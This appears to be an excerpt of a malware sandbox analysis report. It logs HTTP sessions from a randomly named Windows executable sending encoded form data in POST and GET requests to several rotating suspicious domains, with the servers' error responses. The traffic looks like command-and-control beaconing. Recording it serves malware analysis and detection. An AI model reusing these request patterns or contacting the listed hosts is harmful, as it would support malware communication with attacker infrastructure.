                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  31 | 192.168.2.5 | 50007 | 101.32.205.61 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:20:40.390288115 CET | 1789 | OUT | POST /n0se/ HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rwse6wjx.sbs
                                                                                  Referer: http://www.rwse6wjx.sbs/n0se/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 73 6d 44 4d 4f 74 47 69 46 71 4a 41 32 70 35 68 50 32 35 33 4f 2b 55 6a 36 75 76 45 78 70 54 55 61 70 39 31 36 38 58 74 75 4c 6c 2b 6e 33 56 75 79 41 63 45 4d 79 75 49 31 47 63 32 48 47 4c 66 70 71 2b 6a 30 67 36 76 41 46 4a 6d 54 4d 77 6e 4c 6f 41 37 41 58 78 75 76 4b 32 65 54 64 62 64 47 32 62 45 34 4d 64 4e 38 34 54 67 39 67 5a 45 30 43 70 72 34 46 7a 49 37 55 64 45 6b 6b 5a 4c 2f 7a 63 6c 53 79 5a 54 54 42 4c 7a 4f 73 4d 7a 75 4c 7a 6b 47 42 41 4f 52 43 57 69 31 2b 57 64 37 50 74 78 68 79 75 45 47 59 42 6f 30 4a 4a 42 7a 37 54 55 2b 34 4c 6d 51 42 54 62 42 4b 68 46 68 72 2f 50 61 55 6a 31 76 67 63 30 45 67 30 62 33 57 31 35 57 61 58 37 43 77 33 56 44 56 5a 66 54 48 50 59 6a 78 34 39 31 46 55 74 6a 72 70 43 4a 46 67 6e 70 74 79 76 62 35 33 41 78 32 69 66 66 79 51 39 58 34 47 30 38 45 46 65 46 4e 43 79 46 74 64 39 45 33 6b 61 34 2f 34 2f 47 74 61 6f 36 41 35 54 35 44 6c 33 34 37 36 55 42 35 39 6c 2b 74 2f 7a 30 38 4d 59 67 36 76 4c 6e 46 66 70 45 37 33 76 2b 67 47 73 4a 48 73 [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.5 | 50008 | 101.32.205.61 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:20:43.044095039 CET | 503 | OUT | GET /n0se/?LDVlCz=hkrsNdm9A7NEs6AELC9hc5Biy4ux3a/2UN9Ti/zPtL1d4UFJsQdYSGmB1x8mN1/no5/doAmWeXNISuQ7Z6M7ARUekuecQYjdGGqJoetNg5rktHF3zD1BwWzApk9VpjBEpg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:20:44.566230059 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:20:44 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.5 | 50009 | 38.6.78.235 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:20:52.883976936 CET | 746 | OUT | POST /9lgl/ HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.17jkgl.com
                                                                                  Referer: http://www.17jkgl.com/9lgl/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 41 52 69 58 4f 2b 4e 46 50 46 70 4d 47 50 46 6a 48 51 64 33 6a 63 6b 4f 6f 4e 46 36 4c 73 35 6b 6c 62 71 45 49 6d 37 4a 64 46 4d 2f 39 44 73 5a 70 79 6a 39 31 6c 2f 32 76 63 4d 41 76 61 50 47 58 66 7a 66 4f 36 70 68 6c 2f 6a 36 6e 39 4d 57 2f 78 44 6e 30 59 38 45 4a 66 33 55 37 4c 57 74 4d 35 79 37 50 32 55 32 7a 61 70 65 54 4e 51 30 77 77 6c 31 36 42 76 66 49 48 2b 62 38 36 67 76 56 57 62 54 4c 55 42 38 37 32 54 67 54 5a 4d 77 74 32 4a 4b 4d 37 52 31 55 66 75 31 6c 61 57 64 78 63 69 6c 35 61 76 4b 78 5a 41 51 75 30 44 50 41 7a 6d 75 37 50 4f 6a 55 2b 31 33 6b 33 62 31 61 65 31 4b 4f 6d 6b 3d
                                                                                  Data Ascii: LDVlCz=ARiXO+NFPFpMGPFjHQd3jckOoNF6Ls5klbqEIm7JdFM/9DsZpyj91l/2vcMAvaPGXfzfO6phl/j6n9MW/xDn0Y8EJf3U7LWtM5y7P2U2zapeTNQ0wwl16BvfIH+b86gvVWbTLUB872TgTZMwt2JKM7R1Ufu1laWdxcil5avKxZAQu0DPAzmu7POjU+13k3b1ae1KOmk=
                                                                                  Dec 12, 2024 00:20:54.153814077 CET | 262 | IN | HTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 11 Dec 2024 23:20:53 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Content-Length: 33
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                  Data Ascii: 310Q/Qp/KT\


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.5 | 50010 | 38.6.78.235 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:20:55.573148966 CET | 766 | OUT | POST /9lgl/ HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.17jkgl.com
                                                                                  Referer: http://www.17jkgl.com/9lgl/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 41 52 69 58 4f 2b 4e 46 50 46 70 4d 47 76 31 6a 46 7a 31 33 32 4d 6b 50 69 74 46 36 53 38 35 67 6c 62 32 45 49 69 43 4f 64 32 6f 2f 39 6d 51 5a 6f 77 4c 39 37 46 2f 32 37 73 4d 46 68 36 50 33 58 66 2f 74 4f 36 6c 68 6c 2f 48 36 6e 2f 55 57 2f 67 44 67 30 49 38 38 63 76 33 57 6b 62 57 74 4d 35 79 37 50 32 41 49 7a 63 42 65 50 74 67 30 32 56 52 32 35 42 76 63 50 48 2b 62 32 61 67 72 56 57 62 31 4c 57 30 72 37 31 6e 67 54 64 49 77 30 48 4a 4c 43 37 52 4a 61 2f 76 72 74 4c 75 55 38 2f 71 4f 31 35 71 43 68 71 59 33 69 69 79 6c 61 52 75 47 6f 76 69 62 45 74 39 41 31 48 36 63 41 39 6c 36 51 78 79 30 79 6a 56 65 73 37 41 63 6c 4a 6c 73 6c 50 46 74 31 36 73 44
                                                                                  Data Ascii: LDVlCz=ARiXO+NFPFpMGv1jFz132MkPitF6S85glb2EIiCOd2o/9mQZowL97F/27sMFh6P3Xf/tO6lhl/H6n/UW/gDg0I88cv3WkbWtM5y7P2AIzcBePtg02VR25BvcPH+b2agrVWb1LW0r71ngTdIw0HJLC7RJa/vrtLuU8/qO15qChqY3iiylaRuGovibEt9A1H6cA9l6Qxy0yjVes7AclJlslPFt16sD
                                                                                  Dec 12, 2024 00:20:56.845474958 CET | 262 | IN | HTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 11 Dec 2024 23:20:56 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Content-Length: 33
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                  Data Ascii: 310Q/Qp/KT\


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.5 | 50011 | 38.6.78.235 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:20:58.232774973 CET | 1783 | OUT | POST /9lgl/ HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.17jkgl.com
                                                                                  Referer: http://www.17jkgl.com/9lgl/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 41 52 69 58 4f 2b 4e 46 50 46 70 4d 47 76 31 6a 46 7a 31 33 32 4d 6b 50 69 74 46 36 53 38 35 67 6c 62 32 45 49 69 43 4f 64 32 67 2f 39 51 45 5a 70 52 4c 39 36 46 2f 32 6e 38 4d 45 68 36 50 51 58 62 53 6b 4f 36 5a 62 6c 39 76 36 6d 61 49 57 75 69 6e 67 68 34 38 38 44 2f 33 58 37 4c 57 30 4d 2f 53 2f 50 32 51 49 7a 63 42 65 50 72 4d 30 31 41 6c 32 32 68 76 66 49 48 2b 58 38 36 67 44 56 57 44 4c 4c 57 78 57 37 44 58 67 54 35 73 77 76 52 31 4c 4f 37 52 50 58 66 76 6a 74 4b 54 4d 38 2f 47 6f 31 36 32 6f 68 71 67 33 6d 44 50 49 47 68 66 46 38 73 69 61 47 66 78 6d 67 79 71 78 42 72 5a 68 51 43 57 67 35 41 42 56 71 72 6b 61 73 39 74 6e 78 65 4e 66 7a 50 46 55 4f 74 4b 2b 37 57 50 57 72 6d 34 32 4f 6f 2b 42 41 65 34 36 79 44 49 48 74 50 4f 55 64 52 74 74 5a 71 62 36 6a 71 74 68 47 53 34 36 2f 30 6c 47 6f 38 2b 2f 59 45 74 52 2b 42 69 58 37 48 6b 4c 67 47 64 31 6b 75 48 30 32 7a 66 78 7a 30 5a 6a 37 4d 46 36 75 39 71 4b 6b 6a 73 4e 79 6a 78 65 75 6f 41 30 46 6e 67 68 2f 67 50 44 66 42 31 [TRUNCATED]
                                                                                  Dec 12, 2024 00:20:59.519824982 CET | 262 | IN | HTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 11 Dec 2024 23:20:59 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Content-Length: 33
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                  Data Ascii: 310Q/Qp/KT\


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.5 | 50012 | 38.6.78.235 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:00.888006926 CET | 501 | OUT | GET /9lgl/?LDVlCz=NTK3NLhlAEJIOtoeBFtljOkEhfYZVbBGiOzAI1f+R144iBEE4BOnuC3DqsUysY3FH9LbQrV9xfPYm9YM/jyzxs8eKdKq7NnxOPLJXW8Qu/cpUMw46FhSxTz+BHey1p9/Wg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:21:02.185863018 CET | 189 | IN | HTTP/1.1 503 Service Unavailable
                                                                                  Date: Wed, 11 Dec 2024 23:21:01 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Content-Length: 0
                                                                                  Content-Type: text/html; charset=utf-8


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.5 | 50013 | 3.125.36.175 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:07.809226036 CET | 761 | OUT | POST /laeb/ HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.thezensive.work
                                                                                  Referer: http://www.thezensive.work/laeb/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 63 33 34 45 66 2b 44 47 6a 32 34 71 74 58 42 39 4a 74 2f 43 46 31 4f 47 68 56 53 2f 70 58 55 79 58 53 34 35 4f 36 54 6d 2b 6a 4c 71 44 4f 49 7a 7a 4e 72 71 36 6a 54 45 70 75 65 57 74 71 57 48 48 64 6a 72 35 49 6a 30 5a 6e 55 53 41 57 36 4d 41 78 31 71 53 70 68 56 6c 78 2b 34 54 56 30 6d 73 49 72 70 78 52 30 32 39 39 66 37 49 35 74 72 6e 6c 61 30 42 6b 31 4d 4c 65 69 42 32 56 43 4f 4d 38 5a 58 6f 61 4e 77 79 75 32 4c 6e 6c 79 58 2b 43 45 64 34 58 6b 6c 4c 46 62 56 71 5a 70 51 5a 66 6d 59 78 4e 58 72 73 4c 57 43 77 70 70 33 7a 42 78 4e 6a 6e 6f 51 74 6a 69 71 42 4a 67 48 73 35 46 4a 77 52 45 3d
                                                                                  Data Ascii: LDVlCz=c34Ef+DGj24qtXB9Jt/CF1OGhVS/pXUyXS45O6Tm+jLqDOIzzNrq6jTEpueWtqWHHdjr5Ij0ZnUSAW6MAx1qSphVlx+4TV0msIrpxR0299f7I5trnla0Bk1MLeiB2VCOM8ZXoaNwyu2LnlyX+CEd4XklLFbVqZpQZfmYxNXrsLWCwpp3zBxNjnoQtjiqBJgHs5FJwRE=
                                                                                  Dec 12, 2024 00:21:09.175654888 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html
                                                                                  Date: Wed, 11 Dec 2024 23:21:08 GMT
                                                                                  Server: Netlify
                                                                                  X-Nf-Request-Id: 01JEW0DEFTND7EWSCMSEGFAJ6J
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 [TRUNCATED]
                                                                                  Data Ascii: c28<!doctype html><html lang=en><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Site not found</title><style>:root{--colorRgbFacetsTeal600:2 128 125;--colorTealAction:var(--colorRgbFacetsTeal600);--colorRgbFacetsNeutralLight100:246 246 247;--colorRgbFacetsNeutralLight200:233 235 237;--colorHr:var(--colorRgbFacetsNeutralLight200);--colorRgbFacetsNeutralLight700:53 58 62;--colorGrayDarkest:var(--colorRgbFacetsNeutralLight700);--colorGrayLighter:var(--colorRgbFacetsNeutralLight200);--colorGrayLightest:var(--colorRgbFacetsNeutralLight100);--colorText:var(--colorGrayDarkest);--effectShadowLightShallow:0 1px 10px 0 rgb(53 58 62 / 6%), 0 2px 4px 0 rgb(53 58 62 / 8%);--colorRgbFacetsNeutralDark900:6 11 16;--colorStackText:rgb(var(--colorGrayDarkest));--colorCodeText:rgb(var(--colorGrayLightest));--colorRgbFacetsNeutralLight600:84 90 97;--colorGrayDarker:var(--colorRgbFacetsNeutralLight600);--colorTextMuted:var(--colorGrayDarker)}body{font-family:syst [TRUNCATED]
                                                                                  Dec 12, 2024 00:21:09.175688028 CET | 1236 | IN | Data Raw: 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20
                                                                                  Data Ascii: cSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#fff;overflow:hidden;margin:0;padding:0;line-height:1.5;color:rgb(var(--colorText))}@media(prefers-color-scheme:dark){body{backg
                                                                                  Dec 12, 2024 00:21:09.175707102 CET | 907 | IN | Data Raw: 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70
                                                                                  Data Ascii: k;background-color:var(--colorCodeText);color:var(--colorStackText);padding:4px 8px;border-radius:4px;font-size:.875rem;overflow-wrap:anywhere;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,liberation mono,courier new,monospace;


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.5 | 50014 | 3.125.36.175 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:10.474838972 CET | 781 | OUT | POST /laeb/ HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.thezensive.work
                                                                                  Referer: http://www.thezensive.work/laeb/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 63 33 34 45 66 2b 44 47 6a 32 34 71 72 30 5a 39 4c 4f 58 43 43 56 4f 46 74 31 53 2f 6d 33 55 32 58 53 30 35 4f 2f 72 32 2b 32 62 71 41 73 51 7a 39 73 72 71 33 44 54 45 69 4f 65 50 67 4b 58 46 48 63 66 4a 35 4e 4c 30 5a 6e 77 53 41 56 75 4d 63 57 42 74 54 35 68 74 37 52 2b 36 4d 46 30 6d 73 49 72 70 78 52 51 59 39 39 48 37 49 70 39 72 6d 45 61 33 64 30 31 4e 63 75 69 42 79 56 43 4b 4d 38 5a 31 6f 59 31 4f 79 73 2b 4c 6e 67 57 58 2b 32 51 65 78 58 6b 6e 46 6c 61 47 75 37 63 6e 5a 66 76 56 74 4d 53 56 38 39 61 6b 38 2f 59 64 70 6a 35 6c 77 48 45 6f 39 77 71 64 51 35 42 75 32 61 56 35 75 47 52 44 71 2b 4d 55 62 6c 48 34 78 4f 4b 62 35 58 37 66 66 65 68 4e
                                                                                  Data Ascii: LDVlCz=c34Ef+DGj24qr0Z9LOXCCVOFt1S/m3U2XS05O/r2+2bqAsQz9srq3DTEiOePgKXFHcfJ5NL0ZnwSAVuMcWBtT5ht7R+6MF0msIrpxRQY99H7Ip9rmEa3d01NcuiByVCKM8Z1oY1Oys+LngWX+2QexXknFlaGu7cnZfvVtMSV89ak8/Ydpj5lwHEo9wqdQ5Bu2aV5uGRDq+MUblH4xOKb5X7ffehN
                                                                                  Dec 12, 2024 00:21:11.851180077 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html
                                                                                  Date: Wed, 11 Dec 2024 23:21:11 GMT
                                                                                  Server: Netlify
